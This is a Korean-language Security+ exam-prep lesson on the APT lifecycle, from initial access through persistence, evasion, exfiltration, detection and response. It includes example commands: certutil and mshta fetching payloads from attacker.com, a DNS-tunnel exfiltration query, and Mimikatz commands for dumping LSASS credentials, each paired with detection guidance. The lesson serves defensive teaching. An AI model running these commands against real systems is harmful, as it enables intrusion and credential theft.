0Pricing
Cloud & IT Cert Prep · 강의

APT 수명 주기: 초기 접속에서 지속성 확보까지

APT가 표적 피싱을 통한 초기 접속부터 C2 구축, 권한 상승, 재부팅과 재이미징 후에도 살아남는 지속성 메커니즘까지 진행되는 과정을 따라갑니다.

APT 수명 주기: 초기 접속에서 지속성 확보까지은(는) CoddyKit의 무료 Cloud & IT Cert Prep 강의입니다. 이것은 4개 중 1번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cloud & IT Cert Prep 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cloud & IT Cert Prep 강의에는 총 4개의 강의가 포함되어 있습니다.

고급 지속적 위협이란 무엇인가요

고급 지속적 위협(Advanced Persistent Threat, APT)은 일반적으로 국가 지원 공격자나 충분한 자금을 갖춘 범죄 집단이 구체적인 전략적 목표를 가지고 수행하는 정교한 장기 사이버 공격 캠페인입니다. 세 가지 핵심 특징은 다음과 같습니다. Advanced는 맞춤형 악성 코드, 제로데이, 새로운 기법을 사용한다는 뜻입니다. Persistent는 단기간에 공격하고 사라지는 방식이 아니라 수개월 또는 수년 동안 은밀한 존재를 유지한다는 뜻입니다. Threat는 특정 조직을 대상으로 조정된 표적 공격이라는 뜻입니다. 잘 알려진 APT 집단으로는 러시아의 GRU와 연계된 APT28(Fancy Bear), 중국과 연계된 APT41, 북한과 연계된 Lazarus Group이 있습니다.

최초 접근: APT는 어떻게 침입하는가

APT 캠페인은 일반적으로 검증된 몇 가지 최초 접근 기법 중 하나로 시작됩니다. 무기화된 첨부 파일이나 자격 증명을 탈취하는 링크를 사용하는 표적형 피싱이 가장 일반적인 방법입니다. 이메일은 신뢰하는 동료나 협력 업체가 보낸 것처럼 보입니다. 공급망 침해(SolarWinds/SUNBURST 사례)는 신뢰할 수 있는 소프트웨어 업데이트에 악성 코드를 삽입합니다. 인터넷에 노출된 서비스 악용은 패치되지 않은 CVE를 이용해 VPN 장비, Exchange 서버, 웹 애플리케이션을 공격합니다. 워터링 홀 공격은 대상 조직의 직원이 자주 방문하는 웹사이트를 침해하고, 방문자에게 사용자 동작 없이 실행되는 공격 코드를 전달합니다.

실행: 최초 페이로드 실행

최초 접근에 성공한 공격자는 대상 시스템에서 최초 페이로드를 실행해야 합니다. APT는 정상적인 시스템 활동에 섞이는 기법을 선호합니다. 피해자가 콘텐츠를 활성화할 때 실행되는 Office 문서의 악성 매크로, 열었을 때 스크립트를 실행하는 HTML Application(HTA) 파일, 그리고 Living-off-the-Land Binaries(LOLBins)가 이러한 기법에 해당합니다. LOLBins는 mshta.exe, certutil.exe, regsvr32.exe, wscript.exe와 같은 정상적인 Windows 도구를 사용해 공격자 코드를 실행하고 애플리케이션 허용 목록을 우회합니다. 이러한 기법 때문에 최초 페이로드를 정상적인 시스템 활동과 구분하기가 어렵습니다.

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

C2 구축: 공격자에게 연결하기

최초 페이로드가 실행되면 공격자 인프라로 연결되는 명령 및 제어(Command and Control, C2) 채널을 구축합니다. 최신 APT의 C2는 탐지를 회피하도록 설계된 기법을 사용합니다. 정상적인 클라우드 서비스(Teams, OneDrive, GitHub)를 모방한 유사 도메인으로 HTTPS 통신을 수행하고, DNS 터널링을 통해 정상적인 DNS 트래픽처럼 보이는 DNS TXT 레코드 조회에 명령을 인코딩합니다. 또한 Domain Generation Algorithms(DGA)는 시드에서 매일 새로운 C2 도메인을 생성하여 도메인 차단을 무력화합니다. 그 밖에 정상적인 클라우드 플랫폼(Slack API, Google Sheets, Twitter)을 통신 채널로 사용하는 living-off-the-land C2도 있습니다.

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

탐색: 환경 매핑

C2를 구축한 후 APT 공격자는 추가 이동에 앞서 환경을 파악하기 위해 내부 정찰을 수행합니다. 여기에는 BloodHound와 같은 도구를 사용하여 신뢰 관계를 매핑하고 중요 표적을 식별하는 Active Directory 열거, 활성 호스트와 서비스 및 열린 포트를 식별하는 네트워크 검사, 구성 파일이나 비밀번호 데이터베이스 또는 브라우저에 저장된 자격 증명을 파일 시스템에서 검색하는 자격 증명 탐색, 권한 있는 계정과 서비스 계정 및 관리자 워크스테이션을 식별하는 식별 정보 열거가 포함됩니다. 대부분의 탐색 활동은 탐지를 피하기 위해 기본 Windows 도구(net user /domain, ipconfig, nltest)를 사용합니다.

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

권한 상승: 관리자 권한 획득

APT는 일반적으로 제한된 사용자 자격 증명으로 최초 접근을 확보하므로 목표를 달성하려면 권한을 상승해야 합니다. 일반적인 상승 경로는 다음과 같습니다. Mimikatz를 사용해 메모리에서 자격 증명을 탈취하고 LSASS 프로세스 메모리에서 NTLM 해시를 추출하는 자격 증명 탈취, 서비스 계정의 서비스 티켓을 요청한 후 오프라인에서 해독하는 Kerberoasting, 권한이 약하게 설정된 잘못된 구성의 서비스(안전하지 않은 서비스 바이너리 경로, DLL 하이재킹) 악용, 권한 있는 프로세스의 인증 토큰을 훔치는 토큰 가장입니다. User Account Control(UAC) 우회 기법을 사용하면 UAC 프롬프트를 표시하지 않고 일반 관리자 권한에서 SYSTEM으로 이동할 수 있습니다.

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

지속성 메커니즘: 재부팅 후에도 살아남기

APT는 최초 접근을 확보하는 데 많은 노력과 비용이 들었을 수 있으므로, 재부팅과 시스템 재이미징 후에도 살아남는 지속성 메커니즘에 상당한 투자를 합니다. 일반적인 Windows 지속성 기법은 다음과 같습니다. Registry Run Keys(HKLM\Software\Microsoft\Windows\CurrentVersion\Run), 정기적으로 악성 코드를 실행하는 Scheduled Tasks, 자동으로 시작되는 Windows Services, 탐지가 어렵고 대부분의 정리 작업 후에도 살아남는 WMI Event Subscriptions, DLL Search Order Hijacking, 그리고 Boot/Pre-OS implants입니다. Boot/Pre-OS implants에는 OS를 다시 설치해도 살아남는 UEFI 펌웨어 임플란트가 있으며, Equation Group/NSA와 연계된 공격자들이 사용했습니다.

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

방어 회피: 눈에 띄지 않게 숨기기

APT는 엔드포인트 보안 도구와 분석가의 탐지를 피하기 위해 광범위한 방어 회피를 수행합니다. 주요 기법은 다음과 같습니다. 프로세스 주입 — explorer.exe나 svchost.exe 같은 정상 프로세스에 악성 코드를 주입하여 악성 코드가 신뢰할 수 있는 프로세스 이름으로 실행되게 합니다. 타임스탬프 조작 — 파일의 타임스탬프를 변경하여 악성 파일이 수년 전부터 존재했던 것처럼 보이게 합니다. 로그 삭제 및 변조 — Windows 이벤트 로그를 지워 증거를 제거합니다. 코드 서명 인증서 악용 — 도난한 정상 인증서로 악성 코드에 서명합니다. 또한 디스크에 전혀 기록되지 않는 메모리 내 실행(파일리스 악성 코드)을 사용하여 파일 기반 AV의 탐지를 피합니다.

유출: 은밀하게 데이터 훔치기

APT는 DLP 제어와 대역폭 이상 탐지를 유발하지 않도록 데이터 유출을 신중하게 관리합니다. 주요 기법은 다음과 같습니다. 데이터 준비 — 표적 데이터를 암호화된 압축 파일로 모은 다음 며칠에 걸쳐 작은 조각으로 유출합니다. 기업 방화벽 규칙에서 허용하는 클라우드 저장소 서비스(OneDrive, 드롭박스)로 HTTPS를 통한 유출을 수행합니다. 스테가노그래피 — 이미지 파일 안에 데이터를 숨깁니다. 또한 정상 트래픽에 섞이도록 업무 시간에 시간 기반 유출을 수행합니다. APT는 모든 데이터를 대량으로 복사하는 대신 필요한 것(가치가 높은 지적 재산, 자격 증명, 전략 계획)만 유출하여 흔적과 탐지 가능성을 최소화합니다.

APT 활동 탐지: 주요 지표

APT를 탐지하려면 개별 경보를 넘어 공격 단계 전반에서 서로 관련된 활동의 패턴을 식별해야 합니다. 주요 지표는 다음과 같습니다. 비정상적인 부모-자식 프로세스 관계(예: Word가 PowerShell을 생성하는 경우), PowerShell 인코딩 명령 또는 인터넷에서의 다운로드, 비정상적인 시간에 생성된 예약 작업이나 서비스, 시스템 프로세스가 아닌 프로세스의 LSASS 메모리 접근, SMB 또는 WMI를 통한 워크스테이션 간 측면 이동, 길이가 긴 하위 도메인을 사용하는 비정상적인 외부 DNS 쿼리입니다. MITRE ATT&CK Navigator를 사용하면 방어 담당자가 탐지된 기법을 ATT&CK 매트릭스에 매핑하고 탐지 범위의 공백을 식별할 수 있습니다.

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

APT 대응: 눈치채지 못하게 격리하기

활성 상태인 APT에 대응하려면 공격자에게 알리지 않고 위협을 격리하는 신중한 균형이 필요합니다. 너무 이른 격리(C2 트래픽 차단, 계정 비활성화)는 APT가 파괴적인 페이로드를 실행하거나 데이터 유출을 가속하게 만들 수 있습니다. 모범 사례는 다음과 같습니다. 정보를 수집하는 동안 은밀하게 모니터링합니다. C2를 차단하지 않고 방화벽 규칙을 사용하여 감염된 호스트를 점진적으로 분리합니다. 공격자의 활동을 모니터링하기 위해 기만 기술(허니토큰, 카나리 계정)을 배포합니다. 주요 격리 조치에 앞서 법 집행 기관과 협력합니다. 완전한 복구를 위해서는 모든 지속성 메커니즘과 손상된 계정을 식별해야 합니다. 하나의 임플란트라도 놓치면 공격자가 다시 침입할 수 있습니다.

빠른 확인

이 단원에서 다룬 CompTIA Security+(SY0-701) 개념을 얼마나 이해했는지 확인해 보십시오.

단원 요약

이 단원에서는 다음을 배웠습니다. APT는 고도화되고 지속적이며 표적을 정한 공격 캠페인으로, 일반적으로 스피어 피싱, 공급망 공격 또는 취약점 악용을 통해 최초 접근 권한을 확보한 뒤 수개월 동안 활동합니다. 또한 APT는 LOLBins와 정상적인 클라우드 서비스를 C2에 사용하여 정상 트래픽에 섞이고 탐지를 피합니다. 지속성 메커니즘은 Registry Run Keys부터 UEFI 펌웨어 임플란트까지 다양하며, WMI 구독은 특히 탐지하고 복구하기 어렵습니다. 다음에서는 Pass-the-Hash와 Pass-the-Ticket을 비롯한 측면 이동 기법을 살펴봅니다.

자주 묻는 질문

“APT 수명 주기: 초기 접속에서 지속성 확보까지” 강의는 무료인가요?

네 — “APT 수명 주기: 초기 접속에서 지속성 확보까지” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cloud & IT Cert Prep 강의 전체를 잠금 해제할 수 있습니다. Cloud & IT Cert Prep 강의에는 총 4개의 강의가 포함되어 있습니다.

“APT 수명 주기: 초기 접속에서 지속성 확보까지”에서 뭘 배우나요?

APT가 표적 피싱을 통한 초기 접속부터 C2 구축, 권한 상승, 재부팅과 재이미징 후에도 살아남는 지속성 메커니즘까지 진행되는 과정을 따라갑니다. 브라우저에서 직접 실행하는 실습 코드로 Cloud & IT Cert Prep을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Cloud & IT Cert Prep을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Cloud & IT Cert Prep은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 1번째 강의입니다.

“APT 수명 주기: 초기 접속에서 지속성 확보까지” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Cloud & IT Cert Prep 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Cloud & IT Cert Prep 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. APT 수명 주기: 초기 접속에서 지속성 확보까지
  2. 측면 이동: 해시 전달 및 티켓 전달
  3. Kerberoasting 및 골든 티켓 공격
  4. 탐지 및 대응을 위한 MITRE ATT&CK 프레임워크
← Cloud & IT Cert Prep(으)로 돌아가기